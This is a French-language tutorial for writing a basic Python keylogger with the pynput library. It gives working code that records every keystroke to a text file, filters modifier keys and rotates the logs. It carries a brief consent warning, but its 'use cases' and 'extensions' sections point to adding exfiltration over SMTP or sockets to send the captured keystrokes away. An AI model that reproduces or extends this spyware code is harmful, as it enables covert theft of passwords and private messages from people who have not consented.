# Tutoriel : Créer un keylogger basique pour s'entraîner

## 🎯 Objectif  
Concevoir un keylogger Python simple sauvegardant les frappes dans un fichier texte. Parfait pour comprendre leur fonctionnement et apprendre comment s'en protéger.

## 🧠 Scénario d’ancrage émotionnel  
Imaginez un consultant sécurité interceptant son propre clavier pour prouver à un client la dangerosité d’un keylogger malveillant.

---

## 🛠️ Prérequis  
- Linux (Debian/Ubuntu)  
- Python 3  
- Installer `pynput` (ou `keyboard`) via :  
  ```bash
  pip install pynput


⸻

Étape 1 – Capturer les frappes avec pynput

from pynput import keyboard

def on_press(key):
    try:
        k = key.char
    except AttributeError:
        k = f"[{key.name.upper()}]"
    print(k, end='', flush=True)
    with open("keylogs.txt", "a", encoding="utf-8") as f:
        f.write(k)

listener = keyboard.Listener(on_press=on_press)
listener.start()
listener.join()

	•	key.char pour lettres, sinon key.name (ex. [ENTER])
	•	Ouverture en append pour ne pas effacer les logs

⸻

🧩 Étape 2 – Filtrer les touches importantes

Amélioration : ignorer certaines touches comme les contrôles :

ignore = {keyboard.Key.shift, keyboard.Key.ctrl, keyboard.Key.alt}
def on_press(key):
    if key in ignore:
        return
    # log comme avant


⸻

🔄 Étape 3 – Rotation simple des logs (éviter fichiers trop gros)

import os

if os.path.exists("keylogs.txt") and os.path.getsize("keylogs.txt") > 1024*100:
    os.rename("keylogs.txt", "keylogs.old.txt")

Exécuté avant chaque écriture.

⸻

🧠 Analogies & pièges
	•	Caméra cachée : vous captez tout, mais cela peut être illégal sans consentement.
	•	⚠️ Attention : utiliser uniquement sur votre propre machine.
	•	Filtrage important : ne pas logger des touches non utiles.

⸻

🧪 Quiz
	1.	Pourquoi utiliser listener.join() ?
	2.	Que se passe-t-il si on oublie encoding="utf-8" ?
	3.	Pourquoi ignorer ctrl, shift… ?
	4.	Quels risques si le fichier log grossit trop ?
	5.	Comment éviter la perte de données si le script s’interrompt ?

⸻

✅ Cas d’usage
	•	Workshop de sensibilisation
	•	Audit personnel de sécurité
	•	Base pour ajouter exfiltration (SMTP, socket…)

⸻

🔧 Prolongements possibles
	•	Rotations avancées ou compression des logs
	•	Envoi périodique par e-mail ou socket
	•	Interface simple pour lecture en temps réel

⸻

🎓 Résultat attendu

Un script Python minimaliste sauvegardant les frappes, avec filtrage, rotation des fichiers et structure claire.

---

### 📚 Sources  
- Implementation de base avec `pynput`   
- Exemples Windows/Linux via GeeksforGeeks   
- Techniques d’exfiltration SMTP/sockets 